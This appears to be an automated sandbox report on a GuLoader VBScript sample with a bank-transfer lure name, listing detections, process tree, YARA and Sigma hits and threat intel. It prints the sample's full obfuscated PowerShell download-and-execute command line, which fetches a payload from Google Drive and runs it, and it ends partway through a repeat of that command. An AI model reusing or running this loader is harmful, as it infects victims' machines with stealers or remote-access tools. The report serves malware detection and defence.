Edit tour

Windows Analysis Report
r20240913TRANSFERENCIA.vbs

Overview

General Information

Sample name:	r20240913TRANSFERENCIA.vbs
Analysis ID:	1523428
MD5:	6189a9d977994601ef954a1a146e8d8d
SHA1:	93c638448ad65e7b005fa7c4527786e5462b05f2
SHA256:	be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32
Tags:	vbsuser-Porcupine
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 2128 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 1900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6592 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 5792 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

WerFault.exe (PID: 5672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 2284 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2472491841.00000000081C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000005.00000002.2472762628.0000000009395000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000005.00000002.2457764685.00000000053B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
Process Memory Space: powershell.exe PID: 1900	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1900	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xe19d3:$b2: ::FromBase64String( 0xe1a0f:$b2: ::FromBase64String( 0xe1a4c:$b2: ::FromBase64String( 0xe1a8a:$b2: ::FromBase64String( 0xe1ac9:$b2: ::FromBase64String( 0xe1b09:$b2: ::FromBase64String( 0xe1b4a:$b2: ::FromBase64String( 0xe1b8c:$b2: ::FromBase64String( 0xe1bcf:$b2: ::FromBase64String( 0xe1c13:$b2: ::FromBase64String( 0xe1c58:$b2: ::FromBase64String( 0xe1c9e:$b2: ::FromBase64String( 0x13b4b1:$s1: -join 0x148586:$s1: -join 0x14b958:$s1: -join 0x14c00a:$s1: -join 0x14dafb:$s1: -join 0x14fd01:$s1: -join 0x150528:$s1: -join 0x150d98:$s1: -join 0x1514d3:$s1: -join
Process Memory Space: powershell.exe PID: 6592	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6592	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x17e8d:$b2: ::FromBase64String( 0x11a2c:$s1: -join 0xeeaa9:$s1: -join 0xf0f89:$s1: -join 0x43ef2:$s3: reverse 0x5001b:$s3: reverse 0x163254:$s3: reverse 0x1701c3:$s3: reverse 0x2c587f:$s3: reverse 0x2d34ff:$s3: reverse 0x2e0542:$s3: reverse 0x2e1b8e:$s3: reverse 0x2e1e59:$s3: reverse 0x2e24cc:$s3: reverse 0x2e2c71:$s3: reverse 0x2eaed3:$s3: reverse 0x2ed66c:$s3: reverse 0x2eda86:$s3: reverse 0x2ee60e:$s3: reverse 0x2ef2bb:$s3: reverse 0xc461:$s4: +=
Click to see the 3 entries

Other

Source	Rule	Description	Author	Strings
amsi64_1900.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_1900.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xfe4b:$b2: ::FromBase64String( 0xd1d6:$s1: -join 0x6982:$s4: += 0x6a44:$s4: += 0xac6b:$s4: += 0xcd88:$s4: += 0xd072:$s4: += 0xd1b8:$s4: += 0xf55b:$s4: += 0xf5db:$s4: += 0xf6a1:$s4: += 0xf721:$s4: += 0xf8f7:$s4: += 0xf97b:$s4: += 0xd9f6:$e4: Get-WmiObject 0xdbe5:$e4: Get-Process 0xdc3d:$e4: Start-Process
amsi32_6592.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xa9ea:$b2: ::FromBase64String( 0x9a6e:$s1: -join 0x321a:$s4: += 0x32dc:$s4: += 0x7503:$s4: += 0x9620:$s4: += 0x990a:$s4: += 0x9a50:$s4: += 0x13b03:$s4: += 0x13b83:$s4: += 0x13c49:$s4: += 0x13cc9:$s4: += 0x13e9f:$s4: += 0x13f23:$s4: += 0xa28e:$e4: Get-WmiObject 0xa47d:$e4: Get-Process 0xa4d5:$e4: Start-Process 0x14794:$e4: Get-Process

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs", ProcessId: 2128, ProcessName: wscript.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5792, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49715

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs", ProcessId: 2128, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst 